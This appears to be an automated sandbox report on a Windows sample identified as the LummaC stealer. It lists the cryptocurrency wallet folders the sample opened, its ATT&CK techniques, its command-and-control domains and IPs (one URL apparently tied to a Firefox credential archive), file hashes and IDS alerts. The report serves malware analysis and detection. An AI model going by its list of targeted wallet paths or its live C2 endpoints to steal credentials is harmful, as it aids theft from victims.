Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\FvbuInU.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1531650734.0000000001590000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1531596694.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FvbuInU.exe PID: 7544, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: FvbuInU.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: 0.2.FvbuInU.exe.d60000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	44 Virtualization/Sandbox Evasion	1 OS Credential Dumping	861 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	44 Virtualization/Sandbox Evasion	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FvbuInU.exe	76%	Virustotal		Browse
FvbuInU.exe	76%	ReversingLabs	Win32.Trojan.LummaStealer
FvbuInU.exe	100%	Avira	TR/Crypt.XPACK.Gen

Source	Detection	Scanner	Label
https://nebdulaq.digital/aQwdw)	0%	Avira URL Cloud	safe
https://nebdulaq.digital/aQwdw%	0%	Avira URL Cloud	safe
https://nebdulaq.digital:443/aQwdwmartFTP	0%	Avira URL Cloud	safe
https://begindecafer.world/QwdZdf	100%	Avira URL Cloud	malware
https://nebdulaq.digital/	0%	Avira URL Cloud	safe
https://nebdulaq.digital/aQwdw$	0%	Avira URL Cloud	safe
https://nebdulaq.digital/aQwdw	0%	Avira URL Cloud	safe
https://nebdulaq.digital:443/aQwdw	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	0%	Avira URL Cloud	safe
https://nebdulaq.digital/aQwdw2	0%	Avira URL Cloud	safe
https://begindecafer.world/QwdZdfU	100%	Avira URL Cloud	malware
https://begindecafer.world/	100%	Avira URL Cloud	malware
https://nebdulaq.digital/aQwdw?	0%	Avira URL Cloud	safe
https://begindecafer.world:443/QwdZdflt-release/key4.dbPK	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
begindecafer.world	188.114.96.3	true	true		unknown
nebdulaq.digital	104.21.53.52	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://begindecafer.world/QwdZdf	false	Avira URL Cloud: malware	unknown
https://nebdulaq.digital/aQwdw	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://nebdulaq.digital/aQwdw)	FvbuInU.exe, 00000000.00000003.1419875195.0000000005C89000.00000004.00000800.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1419924054.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nebdulaq.digital/aQwdw%	FvbuInU.exe, 00000000.00000003.1771907391.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1771794588.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1772740310.00000000015C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nebdulaq.digital/aQwdw$	FvbuInU.exe, 00000000.00000002.1968513015.0000000001547000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001547000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nebdulaq.digital/aQwdw2	FvbuInU.exe, 00000000.00000003.1468100201.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1468985650.0000000005C8F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20-	FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nebdulaq.digital/	FvbuInU.exe, 00000000.00000003.1853538978.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1772677820.0000000001590000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001580000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nebdulaq.digital:443/aQwdwmartFTP	FvbuInU.exe, 00000000.00000002.1968562073.0000000001553000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001553000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1853538978.0000000001553000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nebdulaq.digital:443/aQwdw	FvbuInU.exe, 00000000.00000003.1531549677.0000000001553000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	FvbuInU.exe, 00000000.00000003.1470490451.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nebdulaq.digital/aQwdw?	FvbuInU.exe, 00000000.00000003.1468276097.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/v20	FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begindecafer.world/QwdZdfU	FvbuInU.exe, 00000000.00000002.1968730807.00000000015BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begindecafer.world:443/QwdZdflt-release/key4.dbPK	FvbuInU.exe, 00000000.00000002.1968562073.0000000001553000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001553000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	FvbuInU.exe, 00000000.00000003.1470490451.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.mozilla.or	FvbuInU.exe, 00000000.00000003.1470330878.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begindecafer.world/	FvbuInU.exe, 00000000.00000003.1967004894.0000000001580000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.53.52	nebdulaq.digital	United States		13335	CLOUDFLARENETUS	true
188.114.96.3	begindecafer.world	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1632098
Start date and time:	2025-03-07 19:36:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FvbuInU.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 23.199.214.10, 2.16.185.191
Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
13:37:31	API Interceptor	181581x Sleep call for process: FvbuInU.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.53.52	https://apiv2.kol.eco/builder-redirect?url=https://ibime.edu.mx/klmrkvlmv/jhhcff/eawseawseawseawseaws/Y2hhcnRsaWViQHNvbWVudGVjLmRl	Get hash	malicious	HTMLPhisher	Browse
188.114.96.3	CjbMEPJZ3J.exe	Get hash	malicious	FormBook	Browse	www.marposet.shop/kexu/?bnb=vB2aylf3Q2XahtdhLosDE8imHxT8gnaOyIU1/x/DWtHmRdE433nBd+fkpXIkCpVdFXbAQIB1mNsJnhcAO1C9KkO96rRwixvsUK4o5J4zTNrClVAPCw==&8v4Hv=cpKH3h
	Ccp3sJPDXs.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	asdff123fsdafasdf.ru/packetLowGeoProtectCentral.php
	justificante de transferencia09454545.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.kdjsswzx.club/myab/?MP=NdxOYJDJG4lm+JEaKG3C3Lbnwt5J/jX7V01w+cJuJBraytzWaHOc0QEGm1yXIwrAoNttsMOQwUptf8Glw1EAh4LN1ggO1axYIhZB7gb+MpY69764OA==&vv=hBodit
	Shipping Document.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/2p9f/
	RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/50g8/
	https://regcompany.marrkone.com/ssddcw/e095cdfe/?aef2d=cmFsaUBiYW5lc2NvdXNhLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	login.marrkone.com/4c8979e070?nxx=dccfc2c7eecccfc0cbddcdc1dbddcf80cdc1c3accdcf
	FRQ 101102-04-25-0948-015.exe	Get hash	malicious	FormBook	Browse	www.tether1.xyz/focp/
	http://uploads-ssl.webflow.com/660018002a32edee7a11d41b/66335b965a5a96f03bd82400_kasuwidavogog.pdf	Get hash	malicious	Unknown	Browse	melurilexuki.urseghy.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=91706aaa4ac64204
	http://netflix-official.com/e/authID=ek3Lf	Get hash	malicious	Unknown	Browse	netflix-official.com/e/img/nficon2016.ico
	PAYMENT SWIFT COPY.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/2p9f/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
begindecafer.world	JqGBbm7.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
begindecafer.world	Br6Dejo3eu.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	104.26.0.139
	New Order.xls	Get hash	malicious	Unknown	Browse	172.67.68.60
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.0.139
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.1.139
	Doc9078786968795776764567.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.0.139
	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	104.26.0.139
	New Order.xls	Get hash	malicious	Unknown	Browse	104.26.1.139
	JqGBbm7.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.1.139
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.0.139
CLOUDFLARENETUS	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	104.26.0.139
	New Order.xls	Get hash	malicious	Unknown	Browse	172.67.68.60
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.0.139
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.1.139
	Doc9078786968795776764567.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.0.139
	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	104.26.0.139
	New Order.xls	Get hash	malicious	Unknown	Browse	104.26.1.139
	JqGBbm7.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.1.139
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.0.139

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	104.21.53.52 188.114.96.3
	New Order.xls	Get hash	malicious	Unknown	Browse	104.21.53.52 188.114.96.3
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.53.52 188.114.96.3
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.53.52 188.114.96.3
	Doc9078786968795776764567.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.53.52 188.114.96.3
	JqGBbm7.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.53.52 188.114.96.3
	NEW ORDER (PO. 2100002 (BT-INC).xls	Get hash	malicious	Unknown	Browse	104.21.53.52 188.114.96.3
	New Order.xls	Get hash	malicious	Unknown	Browse	104.21.53.52 188.114.96.3
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.53.52 188.114.96.3
	Purchase Order.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.53.52 188.114.96.3

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.90839452579607
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FvbuInU.exe
File size:	2'090'496 bytes
MD5:	a4069f02cdd899c78f3a4ee62ea9a89a
SHA1:	c1e22136f95aab613e35a29b8df3cfb933e4bda2
SHA256:	3342c1acf9c247d7737a732ed3e1b3cf64be072b4094f41d50fc1c0ee944d6f4
SHA512:	10b10c2d97f1616b6b73626b3813ffbca4c3ade9154dd48755611d02713ad15ee97597b84a8d3b962b0c143e0de60b468fd2cba992921f43469a5055fea21c39
SSDEEP:	49152:IBQUe7pMmNFPWiRcCCuyL/7ll4//7JKkcq9qNWv1ouR6xk0uNZ:I1WMmjPWrCCuajrrkDPYQ
TLSH:	0FA52215AC352B6BD25C1936518486CAA6C0E114A36EACEFDCF1E17C76EBEC09DB0F50
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g............................. J...........@..........................PJ....... ...@.................................W...k..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8a2000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67C9DDEB [Thu Mar 6 17:39:55 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F8E8502A04Ah
pinsrw mm3, word ptr [edi], 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F8E8502C045h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx+00000002h], bh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jnle 00007F8E85029FC2h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc ebp
add al, byte ptr [eax]
add byte ptr [edx], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x61057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x60000	0x1f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x611f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x5f000	0x5f000	78a548b09a80c386b74dd33fd5f9cd74	False	0.5991108141447369	data	7.20142058220356	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x60000	0x1f0	0x200	ed9cb562edd5fa872c182ae8556f7a61	False	0.626953125	data	4.883492107886929	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x61000	0x1000	0x200	f47b289bcee0e13a937cc29db13607bf	False	0.150390625	data	1.0437720338377494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x62000	0x2a3000	0x200	4f08c17ceb43279291ddea24ab2db9da	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kzbupdkl	0x305000	0x19c000	0x19b800	94d936f8b671a76044b9721bb304311f	False	0.9941578305361483	OpenPGP Public Key	7.952571902495584	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bmqfvobi	0x4a1000	0x1000	0x600	283d77e5b8b6b06ce83bef7f2ac23378	False	0.5559895833333334	data	4.921593981596737	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4a2000	0x3000	0x2200	86b5b631710149ef10c99fb6a9ae5cb5	False	0.06985294117647059	DOS executable (COM)	0.7995920042135382	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4a0494	0x198	ASCII text, with CRLF line terminators			0.5833333333333334

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-07T19:37:30.899123+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49687	104.21.53.52	443	TCP
2025-03-07T19:37:36.436560+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49688	104.21.53.52	443	TCP
2025-03-07T19:37:41.094080+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49689	104.21.53.52	443	TCP
2025-03-07T19:37:46.246258+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49690	104.21.53.52	443	TCP
2025-03-07T19:37:52.577430+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49691	104.21.53.52	443	TCP
